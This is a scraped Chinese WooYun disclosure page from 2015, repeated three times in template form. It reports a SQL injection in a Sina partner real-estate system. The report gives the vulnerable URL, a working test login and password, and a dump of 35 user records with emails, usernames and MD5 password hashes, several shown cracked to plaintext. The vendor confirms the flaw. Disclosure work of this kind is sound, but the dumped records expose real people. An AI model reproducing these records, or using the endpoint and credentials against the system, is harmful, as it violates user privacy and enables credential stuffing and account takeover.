新浪某系统存在高危SQL注入漏洞四（支持UNION）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105649

漏洞标题：新浪某系统存在高危SQL注入漏洞四（支持UNION）

漏洞作者： HackBraid

提交时间：2015-04-06 19:07

修复时间：2015-05-22 10:38

公开时间：2015-05-22 10:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-06：细节已通知厂商并且等待厂商处理中
2015-04-07：厂商已经确认，细节仅向厂商公开
2015-04-17：细节向核心白帽子及相关领域专家公开
2015-04-27：细节向普通白帽子公开
2015-05-07：细节向实习白帽子公开
2015-05-22：细节向公众公开

简要描述：

详细说明：

UNION可跨20+的数据库，给个20rank要求不高吧？
http://broker2.esf.leju.com/todayusestat/port?agentid=8116554 lj_shop543 123456登录后抓包，支持UNION

漏洞证明：

看到db_fangyou ,看看影响力，百万级的用户信息泄露

用户名、密码信息都有了~

Database: db_fangyou
Table: fy_user
[35 entries]
+--------+--------+--------+----------+----------+---------------+------------------+------------+---------------------+---------------------+-------+--------+--------+---------+--------------------------+----------+----------+---------------------------------------------+---------------------+---------------------+-------------+--------------+--------------+--------------+-----------------+
| uid    | cuid   | uuid   | appr_uid | root_uid | bargain_baidu | isbaidumoderator | role       | cdate               | udate               | enter | status | be_cxt | from400 | username                 | citycode | fromtype | password                                    | appr_date           | last_login          | total_point | profile_edit | bargain_sina | total_clicks | issinamoderator |
+--------+--------+--------+----------+----------+---------------+------------------+------------+---------------------+---------------------+-------+--------+--------+---------+--------------------------+----------+----------+---------------------------------------------+---------------------+---------------------+-------------+--------------+--------------+--------------+-----------------+
| 525717 | 311865 | 0      | NULL     | 264717   | 1             | 0                | agent      | 2010-09-20 08:52:50 | 2012-10-16 02:59:38 | NULL  | 0      | 3      | 0       | j56888864@yeah.net       | bj       | 0        | 73b39125241ae0fb904f8de20f14ac70            | NULL                | 2010-10-28 17:50:34 | 480         | 0            | 1            | 9            | 0               |
| 525716 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:51:22 | 2010-09-20 08:51:22 | NULL  | 0      | 0      | 0       | sjzxxkj@sina.cn          | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525715 | 0      | 0      | 525715   | 0        | 1             | 0                | agent      | 2010-09-20 08:50:49 | 2012-05-30 13:56:08 | NULL  | 0      | 3      | 0       | zhuguang112233           | bj       | 2        | 8527de5872c58cfdc57bb222c670b454            | 2011-04-26 21:10:23 | 2010-11-11 13:33:43 | 2450        | 0            | 1            | 17           | 0               |
| 525714 | 0      | 0      | NULL     | 0        | 1             | 0                | agent      | 2010-09-20 08:50:04 | 2015-04-02 23:10:02 | NULL  | 3      | 3      | 0       | wayen1980                | sy       | 1        | 6c2e018a8171e7bb178a5201289ff04d            | NULL                | 2011-01-23 16:44:56 | 9860        | 0            | 1            | 3434         | 0               |
| 526932 | 310019 | 0      | 526932   | 259275   | 1             | 0                | agent      | 2010-09-21 08:46:14 | 2012-10-16 03:01:30 | NULL  | 0      | 3      | 0       | xiayuyytian@163.com      | bj       | 0        | e10adc3949ba59abbe56e057f20f883e (123456)   | 2010-09-21 21:15:02 | 2010-09-23 15:30:32 | 310         | 0            | 1            | 7            | 0               |
| 525713 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:48:52 | 2010-09-20 08:48:52 | NULL  | 0      | 0      | 0       | mulingxia                | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525712 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:48:34 | 2010-09-20 08:48:34 | NULL  | 3      | 0      | 0       | hi876@163.com            | bj       | 2        | 1bbd886460827015e5d605ed44252251 (11111111) | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525711 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:48:21 | 2011-01-07 18:07:45 | NULL  | 0      | 0      | 0       | 525711                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525710 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:47:19 | 2010-09-20 08:47:19 | NULL  | 0      | 0      | 0       | limin88168               | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525775 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 09:36:35 | 2010-09-20 09:36:35 | NULL  | 3      | 0      | 0       | c_af@yahoo.com.cn        | bj       | 1        | ebe7bb949457e7448661666aa96daf85            | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525709 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:46:15 | 2010-09-20 08:46:15 | NULL  | 0      | 0      | 0       | xiaomei1011              | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525708 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:45:00 | 2010-09-20 08:45:00 | NULL  | 0      | 0      | 0       | tracytour@sina.com       | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525707 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:43:31 | 2010-09-20 08:43:31 | NULL  | 0      | 0      | 0       | mxm710727@126.com        | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525706 | 0      | 0      | NULL     | NULL     | 1             | 0                | agent      | 2010-09-20 08:43:14 | 2012-05-30 13:56:08 | NULL  | 0      | 0      | 0       | yujunxiaolan             | bj       | 2        | 723d505516e0c197e42a6be3c0af910e (5201314)  | NULL                | 2010-09-20 08:43:35 | 10          | 0            | 1            | 4            | 0               |
| 527436 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-21 14:11:52 | 2010-09-21 14:11:52 | NULL  | 0      | 0      | 0       | qdsh2008_vip             | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525704 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:34:56 | 2010-09-20 08:34:56 | NULL  | 0      | 0      | 0       | xujunmin99@163.com       | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525703 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:34:41 | 2010-09-20 08:34:41 | NULL  | 0      | 0      | 0       | hljgxj_eb1aj             | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 530340 | 530333 | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-24 22:25:01 | 2011-01-07 17:11:16 | NULL  | 0      | 0      | 0       | 530340                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525702 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:33:51 | 2010-09-20 08:33:51 | NULL  | 3      | 0      | 0       | fzxiexiaoyu@163.com      | bj       | 1        | e10adc3949ba59abbe56e057f20f883e (123456)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525700 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:28:06 | 2010-09-20 08:28:06 | NULL  | 0      | 0      | 0       | 1473894884@qq.com        | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525699 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:27:22 | 2011-01-07 18:07:44 | NULL  | 0      | 0      | 0       | 525699                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525698 | 0      | 446    | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:25:57 | 2015-02-25 11:16:44 | NULL  | 3      | 0      | 0       | hf_zuo@163.com           | bj       | 1        | e10adc3949ba59abbe56e057f20f883e (123456)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525697 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:21:42 | 2011-01-07 17:13:27 | NULL  | 0      | 0      | 0       | 525697                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 527425 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-21 14:03:54 | 2010-09-21 14:03:54 | NULL  | 3      | 0      | 0       | xiaolulu1207@hotmail.com | tj       | 1        | 624aab438f34c693aa8c2e8f7ca4385c            | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 528867 | 313646 | 528867 | NULL     | 8076967  | 1             | 0                | agent      | 2010-09-23 14:31:58 | 2015-02-03 15:25:36 | NULL  | 3      | 3      | 0       | 13911294166@126.com      | bj       | 1        | e10adc3949ba59abbe56e057f20f883e (123456)   | NULL                | 2010-09-23 14:33:35 | 2000        | 0            | 1            | 3            | 0               |
| 525695 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:13:31 | 2010-09-20 08:13:31 | NULL  | 3      | 0      | 0       | bjhzyyx@163.com          | bj       | 1        | e737a9aa08ac17a37ccbdd1cdbd5c930 (081000)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525694 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:12:47 | 2010-09-20 08:12:47 | NULL  | 0      | 0      | 0       | nick=yangguangfengyu7722 | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525693 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:12:14 | 2010-09-20 08:12:14 | NULL  | 0      | 0      | 0       | manger4713_              | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525692 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 08:03:29 | 2010-09-20 08:03:29 | NULL  | 3      | 0      | 0       | 244803182@qq.com         | bj       | 1        | 931810435ac7336be1da4f785797e14b (214214)   | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525690 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:49:14 | 2010-09-20 07:49:14 | NULL  | 0      | 0      | 0       | huangyang1012761         | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525689 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:43:32 | 2010-09-20 07:43:32 | NULL  | 0      | 0      | 0       | 15513276277              | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525691 | 257539 | 257539 | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:58:06 | 2010-09-20 07:58:06 | NULL  | 0      | 0      | 0       | 北京boy_0308               | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525688 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 07:06:38 | 2010-09-20 07:06:38 | NULL  | 0      | 0      | 0       | clfc                     | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525687 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 06:43:21 | 2010-09-20 06:43:21 | NULL  | 0      | 0      | 0       | luochengyu               | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
| 525684 | 0      | 0      | NULL     | NULL     | 1             | 0                | individual | 2010-09-20 05:05:39 | 2010-09-20 05:05:39 | NULL  | 0      | 0      | 0       | lyle09                   | NULL     | 0        | NULL                                        | NULL                | NULL                | 0           | 0            | 1            | 0            | 0               |
+--------+--------+--------+----------+----------+---------------+------------------+------------+---------------------+---------------------+-------+--------+--------+---------+--------------------------+----------+----------+---------------------------------------------+---------------------+---------------------+-------------+--------------+--------------+--------------+-----------------+

修复方案：

这么多账户，给个20把

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2015-04-07 10:36

厂商回复：

感谢支持，属于第三方合作业务漏洞，已经交给其进行处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105649

漏洞标题：新浪某系统存在高危SQL注入漏洞四（支持UNION）

相关厂商：新浪

漏洞作者： HackBraid

提交时间：2015-04-06 19:07

修复时间：2015-05-22 10:38

公开时间：2015-05-22 10:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105649

漏洞标题：新浪某系统存在高危SQL注入漏洞四（支持UNION）

相关厂商：新浪

漏洞作者： HackBraid

提交时间：2015-04-06 19:07

修复时间：2015-05-22 10:38

公开时间：2015-05-22 10:38

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0105649"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：